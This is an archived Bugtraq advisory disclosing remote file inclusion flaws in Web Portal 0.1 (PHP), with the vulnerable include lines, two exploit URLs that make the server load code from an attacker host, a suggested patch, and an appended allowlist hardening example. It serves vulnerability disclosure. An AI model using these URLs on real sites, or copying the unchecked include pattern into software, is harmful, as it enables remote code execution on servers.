Bugtraq mailing list archives
Web Server Creator - Web Portal 0.1 (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 25 Nov 2002 17:33:41 +0100
Information :
°°°°°°°°°°°°°°
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
news/include/customize.php :
------------------
<?
$langfile = $l;
include $l;
?>
------------------

index.php :
-----------------------------------
[...]
if (!$pg) {
    $pg = "acceuil";
}
[...]
require ("$pg.php");
?>
[...]
-----------------------------------

Exploits :
°°°°°°°°°°
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with http://[attacker]/file.txt

and

http://[target]/index.php?pg=http://[attacker]/badfile
with http://[attacker]/badfile.php

Solution :
°°°°°°°°°°
- Delete bugged lines in news/include/customize.php
- In index.php replace this line :
require ("$pg.php");
by :
-------------------
if (file_exists($pg.".php")){
    require ("$pg.php");
}
-------------------

A patch can be found on http://www.phpsecure.org.

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n
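
Added example, not part of the original post and not the project's or phpsecure.org's patch: one way to harden the index.php page include with an allowlist, since an existence check on its own does not restrict which file gets loaded. The function name resolve_page(), the pages directory and the page names other than "acceuil" are assumptions made for illustration.

```php
<?php
// Added example (not from the advisory or the Web Portal code base).
// Hypothetical names: resolve_page(), the pages directory, the page list.

/**
 * Map a user-supplied page name to a file inside $pagesDir, or return null.
 * Only allowlisted names are accepted, so the request value never becomes
 * a path or URL on its own.
 */
function resolve_page($pg, array $allowed, $pagesDir, $default = 'acceuil')
{
    if (!is_string($pg) || $pg === '') {
        $pg = $default;              // same default page as the original index.php
    }
    if (!in_array($pg, $allowed, true)) {
        return null;                 // URLs, "../" sequences, unknown names
    }
    $real = realpath($pagesDir . DIRECTORY_SEPARATOR . $pg . '.php');
    $base = realpath($pagesDir);
    // Defence in depth: the resolved file must sit directly inside $pagesDir.
    if ($real === false || $base === false || dirname($real) !== $base) {
        return null;                 // missing file or path outside the directory
    }
    return $real;
}

// Constructed demo: a throwaway pages directory and sample request values.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wsc_pages_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'acceuil.php', "<?php echo 'home';");
$allowed = array('acceuil', 'news', 'contact');   // assumed page names

$samples = array('', 'acceuil', 'news', '../index', 'http://example.invalid/x');
foreach ($samples as $pg) {
    $file = resolve_page($pg, $allowed, $dir);
    printf("%-28s => %s\n", var_export($pg, true),
           $file === null ? 'rejected' : basename($file));
}
```

In index.php the value would be read explicitly, for instance from $_GET['pg'], instead of relying on the global $pg, and a null result would be answered with a 404 before any require is reached.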